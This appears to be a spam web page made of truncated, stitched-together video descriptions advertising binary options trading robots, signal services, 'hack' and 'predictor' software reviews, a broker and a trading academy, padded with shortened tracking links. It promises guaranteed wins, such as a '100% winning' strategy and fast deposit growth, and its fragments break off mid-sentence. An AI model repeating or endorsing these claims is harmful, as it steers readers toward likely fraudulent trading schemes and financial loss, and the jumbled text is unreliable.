💰💲FULL BEGINNER? Join My PERSONAL TRAINING!💴💵 BLW Trading Academy: http://www.blwtradingacademy.com/ Live Trading Signals HERE!🔙💲💹Join My ... Binary Options Robot - Automated Binary Options Trading Using Binary Option Robot Test Binary Options Robot here - http://track.logic.expert/67b0b668-c6a4-42... Binary Money Maker Software Review - Binary Options Trading Software That Works http://yourl.pw/bmm http://youtu.be/rDkWa4j1_TI Binary Money Maker Software R... https://binaryoptionsbeat.com/ Contact me at: [email protected] Here I try to explain How to grow your deposit fast in few days and earn money from b... my auto-trading software can work with any indicators on mt4 to send signals to binary account . you can choose intrabar or next bar option , you can set mar... 👨🏽‍💻 IQ Option $ The best broker 2020: - https://bit.ly/3hMNU9b I'll show you 100% winning iq option strategy 7 win VS 0 loss Binary Predictor Software Review - Binary Options Trading Software That Works http://yourl.pw/bp http://youtu.be/ENRYDfs-3W0 What is Binary Predictor Softwar... The road to success through trading IQ option Best Bot Reviews Iq Option 2020 ,We make videos using this softwhere bot which aims to make it easier for you t... Binary options is arguably the speediest increasing fiscal trade. A lot of here men and women how to trade binary options all over the globe are actually being attentive to the trade, when ... Binary Trading Hack Software Review - Binary Options Trading Software That Works http://yourl.pw/bth http://youtu.be/gl1WZv2HXyM Binary Trading Hack Software...

https://binaryoptiontrade.grinenprocton.ml